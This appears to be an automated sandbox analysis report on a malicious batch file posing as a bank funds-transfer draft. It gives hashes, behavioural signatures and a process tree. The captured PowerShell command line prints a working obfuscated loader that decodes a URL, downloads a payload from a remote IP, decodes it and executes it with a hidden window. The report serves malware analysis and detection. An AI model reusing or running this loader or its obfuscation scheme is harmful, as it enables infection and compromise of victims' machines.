Analysis
  max time kernel: 298s
  max time network: 293s
  platform: windows10-2004_x64
  resource: win10v2004-20240508-en
  resource tags: arch:x64, arch:x86, image:win10v2004-20240508-en, locale:en-us, os:windows10-2004-x64, system
  submitted: 10/06/2024, 16:26

Static task: static1

Behavioral task: behavioral1
  Sample: CBQ Funds transfer DraftUdkikspostens44.bat
  Resource: win10v2004-20240508-en

Behavioral task: behavioral2
  Sample: CBQ Funds transfer DraftUdkikspostens44.bat
  Resource: win11-20240508-en
General
  Target: CBQ Funds transfer DraftUdkikspostens44.bat
  Size: 6KB
  MD5: 84cb66117acd5104ada1321c3b472f94
  SHA1: ee6ca999a1798296139fc0eddca01b10d955e00d
  SHA256: 7ae20837250877cb92dbee596d6deb6e15b09480408a0050d21b2332152f2af9
  SHA512: 483f0f275710dfceef0af0da3ddf3b72a52a80ab788d31fca647e3a28d585f1feedffad182baa9b1ba70e32b8e671c6823b74352db950ad27fd3f3d71ced349e
  SSDEEP: 192:Fk33ynxcIG+cPPX99/PdQ9LXJICyD+QRK:FkSmtnN5FQpJJ
Malware Config
Signatures

Blocklisted process makes network request (12 IoCs)
  flow  pid   Process
  2     3924  powershell.exe
  7     3924  powershell.exe
  13    3924  powershell.exe
  14    3924  powershell.exe
  16    3924  powershell.exe
  17    3924  powershell.exe
  19    3924  powershell.exe
  21    3924  powershell.exe
  23    3924  powershell.exe
  24    3924  powershell.exe
  26    3924  powershell.exe
  27    3924  powershell.exe

Command and Scripting Interpreter: PowerShell (1 TTPs, 1 IoCs)
  Run PowerShell and hide display window.
  pid   Process
  3924  powershell.exe

Suspicious behavior: EnumeratesProcesses (2 IoCs)
  pid   Process
  3924  powershell.exe
  3924  powershell.exe

Suspicious use of AdjustPrivilegeToken (1 IoCs)
  description              pid   Process
  Token: SeDebugPrivilege  3924  powershell.exe

Suspicious use of WriteProcessMemory (4 IoCs)
  description                        pid   Process         procid_target
  PID 4920 wrote to memory of 3924   4920  cmd.exe         81
  PID 4920 wrote to memory of 3924   4920  cmd.exe         81
  PID 3924 wrote to memory of 976    3924  powershell.exe  83
  PID 3924 wrote to memory of 976    3924  powershell.exe  83
Processes

- C:\Windows\system32\cmd.exe (PID 4920, tree depth 1)
  Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\CBQ Funds transfer DraftUdkikspostens44.bat"
  Signatures:
  - Suspicious use of WriteProcessMemory

- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 3924, tree depth 2), command line as captured:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden "$Gaseosity = 1;Function Boligforeningerne($Topsyturn196){$Lappe=$Topsyturn196.Length-$Gaseosity;$Xylofoner='Substring';For( $Sneezeless=5;$Sneezeless -lt $Lappe;$Sneezeless+=6){$Sjoflende+=$Topsyturn196.$Xylofoner.Invoke( $Sneezeless, $Gaseosity);}$Sjoflende;}function Trkosten($Phenotypically){ . ($Frikirkeligt) ($Phenotypically);}$Mllerier=Boligforeningerne 'AnoliMStin,oUnspezWreckiBe aulHoldilDemoraStemn/Malin5 cabr. Elec0Skarv Muyan(ModdeWbytt i SynanSoldad StraoTostsw P.wisEphem PrehoNmerciTMorig Kjert1Oen,t0 Ingr. T be0Hoved; lukf Re,igW.serbiBiflon S,ru6forel4Vur.e; Desp T lrexB.igi6Ska,l4,utom;.ivva Jugulr Slu,vRodfo:Tran,1Koumy2medb 1Bibeh.Skral0 Dott) Am,h OverhGHeksaeRigsecPigbok,lapsoForre/Try.n2Extra0Reti 1Srgmo0 Afho0Hemme1Pos,l0Frihe1 S.op PlyshFDivisiYorejr appeeDybsifKr,nvoUd tyxResor/ ,ivi1Vejre2Amanu1gips .Noncr0Refle ';$Batching=Boligforeningerne 'AdiapUA.aphsKabaleXerxer Resu- SpirA rueg FarieHydron OrthtPist ';$Phalerate=Boligforeningerne 'TimebhLysstt Inolt c,ucpBeskf: P eu/Arm e/M,let1Podop9Scott4Block.m,ste5Bonde9 Tred.No.ap3 Nonl1Rosen.Uljam1 Cull8disb 7anvil/Wa,neSLefl.tOpmunv Zeron Bel.eNeurovOxy,ea AmirrJataksIn,pelfra seAgregrAzotinKil,eegrovvsApana.K,bbaaNonbrsDukkedS,ttl ';$Slkkendes=Boligforeningerne ' Blve> R ts ';$Frikirkeligt=Boligforeningerne 'AnkomiEjerfeHypo xProgr ';$Tranebrret='Genoplivningernes';$Rentetabet = Boligforeningerne 'BarcoeViscic karnhAnticoWaspy Lsni% Doc aMobbipPre.ep Dyr.dMaltlaOverdtB.mbaa .itt%Linke\ WebsPGe.brrZeoidopredrgSk.ivr.elenaKe ikmSanctdKundeiKo kkskonfikAtropeBelnnsfakir. S kupA,trouKartobL,yal Ud ug&Treva&Assig G,aseUn,vic Lan.hTas mo Supe OmbyttGyni. 
';Trkosten (Boligforeningerne 'Termo$ Ph.sgKursulKirkeoStrmkbDulcaa UnbrlDimen:ostraBMalvao UarbmUticksprecotV,rver Af.ekPresut,ncha=Opbyg( synkcRedemmf.lmsdTempo Peini/U,dancKugle Wales$ VddeR MusteBru.hnReputtInconeM tritKittiaKludebReakteBinyrtBrand) cill ');Trkosten (Boligforeningerne 'Lford$Dr megSamm l OnycoInfusbE.akuaUncurlEstop:InoppARu,agrGle,evChec,tSnuffaO drag CommeCombir OplasNikke3Museu2Downb=benzi$ DiamP TraphFilmga sopelTeglveIchthrLidesaEquiptHo,edeSides.RasursBarbapCalorl,euniiBi cht,cari(Archd$Frys SOv rdl AntekIntelkTi eseAilurnUncl dTyskee N,olsFornu) orn ');$Phalerate=$Arvtagers32[0];$Skorpende= (Boligforeningerne 'Somno$snerlgBedrvl Pi.poFoulebNasioaS.olelBloe :Re,exAF.rlif praitPrinca BarngTurisn SupeiAgroin fferg Skil=SceneN DelaeKalkkwEnla,-FrausOE,ittbBo,stjMad,geDeltictelsltFlgev Rudd,S HjeryRegntsBurretEksise StabmA ria.RetinN RekleSkrlltSkole.Eft rWVarigeStudibJavakCDogmalSiderimalieeSnootnOmgngt');$Skorpende+=$Bomstrkt[1];Trkosten ($Skorpende);Trkosten (Boligforeningerne ' Slvi$ChuumA LillfBr getR.mfraMinstgHolmbn,laceiIndivnSkovfgVideo.SkarnHTipoleSupp,a angdAn ipeVideorSamfusA.elo[Mel e$Pla oBAeronaReafftRutincUnbithUnpeniItinenWrungg ate]Pi.hf=De.el$ SmooMLvindlK,mmulYdelsenonrerBladmiMusike,nsecrM dst ');$Shockwave=Boligforeningerne 'Fdeva$ t,peALa sef PrgntSkrydaGenopgsquamnBevi,ich vanLektugfette.pu luD dotaoCootewUhm,enForaalLivsboPomada ,guddVarenFSammei PlanlStatie Hear(telef$G nudPEjidohv negaFannelweepaeHandir Sonda YvertKildee Last, Orth$ Qu.tN bonuy E ertSkibotEir.ee,ucaivPostsiMeinerRef.skViskenUnshaiStresnHashpg,nboneContrnHink.)Hoved ';$Nyttevirkningen=$Bomstrkt[0];Trkosten (Boligforeningerne 'Flumd$,orgeg ropolTppefoSekunbbe.ola.iscil Prin:Kaab,SOver.oHam tlLobataFyrstnC rteiGo.henCassasUnent=Pl nk(Tu,keT Milje FeltsUpaaktBjler-Tect.PChaisaNyr mt Haanh Unau Inart$GlobaN.chooyknurstEusuctRechaekonfev anfricheesrFonogkBooknnSy,paiCo.ntnP,ssigFllese PrecnQuart)Sikke ');while (!$Solanins) {Trkosten (Boligforeningerne 
'.anse$N.nsugTidsalMea,woHovedbPyopnaOrgeal Kvin:Countlaarsbs issubLiljelTipstaSiderdTappesconvobKa alg verteGeninrC,rdls Jord=Ti,ss$ asttHunderCountu KrideHylde ') ;Trkosten $Shockwave;Trkosten (Boligforeningerne ' FlamSbalkrtMed.ca litor UncotFl.es- PalaSAnie.llula.eTerm e.dkerpvan.s Altin4Andel ');Trkosten (Boligforeningerne 'Kobr.$VgtstgForbulV.rseoKlenobRelataEnerglDybfr:FlehoSEnforoSympal palea CounnCvs,oiLacewn fires Lion=Thasi(TatspTIn,oreBegyns OutrtSolit-TeetsPhyp caSici tSwizzhgrdho Jerik$MisjoN.irknyDermot LakitStrubebebruv ebuiUdsvvrBoo,mkRei cnApogaiArmennIndlsgDuckyeCarvenBas,a) Unde ') ;Trkosten (Boligforeningerne 'Ph,go$ Zeu,gAfriclSmaafo Stylb Fd paokkerl kv.r:.edthBTerm eFrysedBondoeUnfitnPn,umsTus,e=Arbit$P,stcgVa.ddl ndstofemtob.iphyaPhysilTrev.: UnseSF rege .angmSh,moi HerbcKampdaRearor ruitbPhysoaSpankz,eforoDrej.nOr iseMarkf+ Rejs+Forsv%anden$PrecoACaterr.unstvSviret P,ssaUnp ngFaikeekrig,rJ,viassim n3Appra2,astr..eepscKlinkoMiljbuD,elln Vi tt ,ubi ') ;$Phalerate=$Arvtagers32[$Bedens];}$Coincides=318126;$Flyvesikkerhed=29110;Trkosten (Boligforeningerne 'Hun,e$Supe,g N,bbl areowitlebPrestaUnderlBem,s:SvindDAvisuuRe oll Mic lLydensKatalvHjkulitastylOver.lMuslieLiv l Nonmi=Abstr BrachG.atlieDi mat ,ubp-HeterCStapeo PosinImmertCassoeSmandnEelymt Vgtf raast$VedlgNSkoley .nobtalt,vtConcoeLese,vLikviiUneffrRelatkCa,ernG afiiUninvn Gri.gUdkrye Ordkn P ea ');Trkosten (Boligforeningerne 'L ngv$TendegPengel boaroEje ib multaSetonlNykal:RecapSrandbm,utikrPlagisA.klnkVersee Bi.feP,ussrCivilnFyld eThimbsDetek D ohi=Looi Untra[ Gea,S ryptySkalpsForbrtRediseWashim V,ne. 
RomaCNoncooElektnMemsavPr,sceStemprRevertlntri]te.re:Raaki:Opl.dFExtrarBrevboKom,lm ProcBStolza pplasDub,eeUnscr6vough4UngarSPjevstDa oprind,aiLevnen Onl gSaml,( Semi$supprDS intu Halsl M ril homes .oplvSau hiMin rl Bl allov,seTarso) Apo ');Trkosten (Boligforeningerne ',equi$ Skumg .ksplConseo,yderb FlyvaAeroclTimet:Krimis MulttP.deraD.ojarGrusetdemo,sAci bvDeed,iWeepin W ltgPresssEmoti Revan=Frste Skriv[ ,lanSSkildyFinansEnrapt Brane ooram Duol.TanksTWa,dpeQuickxIncontPoeti.My.erEKabelncollecFor,mo Na,idClassiSkvatn.ensogMar f]Stora:Ante,:P.ratA FyrrSYomudCAntisITinseIForeg.SnowbGhlofteNonattHep aSSlenttSkattr Lre.iE,cranJeglagAfteg( Kyan$ UnclSfstnimSegurr Synbs.ngynkTamoreC,phaeUm.rarProgrn Genee,alilsWhirr)Pe iz ');Trkosten (Boligforeningerne 'Strib$O.reggTremolT.ysto ,ultb SkruaSupr lTetra:InfraS Fl ekUniseaKoglethystetUncone Hel r Gar,eMassatAlmi.s R gslGloriiadvokgstart=Nonch$Subc sNglettWien.aInte,rUngeatVestisSmagfvPrismiIndekn Hje.gStjfisS jer. Medis,roduuBongobMascusDampbtObs.qr Hje,iYderznHandeg Genn(Autog$UprakCUnchaoRutaeiInternSkylnc ChociUnpundPatene aggasUnfoa,Flyv.$CatecFUr.tel SolfyPrisevAdmineFlagssM,nkeiFlammkSelvbkGeekyeScriprVanpoh T rneEm,cidretsv)T oro ');Trkosten $Skatteretslig;"2⤵
  Signatures:
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID: 3924

- C:\Windows\system32\cmd.exe (PID 976, tree depth 3)
  Command line: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Programdiskes.pub && echo t"
Network
MITRE ATT&CK Enterprise v15
Downloads

- Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82